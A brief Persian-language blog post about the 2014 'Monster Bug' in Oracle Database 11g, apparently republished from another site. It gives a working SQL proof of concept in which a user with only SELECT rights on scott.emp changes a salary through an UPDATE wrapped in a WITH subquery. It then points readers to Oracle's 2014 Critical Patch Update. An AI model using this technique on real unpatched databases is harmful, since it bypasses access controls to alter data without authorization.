منبع اصلی نوشتار زیر در این لینک قرار دارد

Monster BUG In Oracle 11g

در Augest سال 2014 یک باگ امنیتی در اوراکل دیتابیس شناسایی شد که کارشناسان اسم Monster BUG را روی آن گذاشتند.

و جالب است بدانید که این باگ تا آخرین ریلیز از نسخه 11g یعنی 11.2.0.4 نیز وجود دارد!!!

در تشریح این باگ بطور خلاصه: در صورتی که به کاربری در دیتابیس دسترسی Select بر روی یکی از جداول خود را بدهید، آن کاربر می تواند با روش زیر جدول مذکور را Update کند:

SQL> create user user1 identified by 123 ;
User created.

SQL> grant create session , create table to user1;
Grant succeeded.

SQL> grant select on scott.emp to user1;
Grant succeeded.

SQL> conn user1/123
Connected.

SQL> select ename , sal from scott.emp where ename='ALLEN';
ENAME SAL
---------- ----------
ALLEN 3600

1 rows selected.

SQL> update scott.emp set sal=1000 where ename='ALLEN';
update scott.emp set sal=1000 where ename='ALLEN'
*
ERROR at line 1:
ORA-01031: insufficient privileges

SQL> update (with tmp as (select * from scott.emp) select * from tmp) set sal=1000 where ename='ALLEN';

1 row updated.

SQL> commit;
Commit complete.

SQL> select ename , sal from scott.emp where ename='ALLEN';
ENAME SAL
---------- ----------
ALLEN 1000

خوشبختانه این مشکل با ارائه Critical Patch Update - CPU2014 توسط شرکت اوراکل برطرف شده است.

شما می توانید با مراجعه به بخش پشتیبانی اوراکل (Support.oracle.com) این patch را جستجو و پس از دانلود برروی دیتابیس خود نصب نمایید.لازم به توضیح است که برای دسترسی به این بخش از سایت اوراکل نیازمند اکانت MetaLink هستید و با کاربری که به طور معمول در اوراکل ایجاد می شود اجازه دسترسی به این بخش را نخواهید داشت.

منبع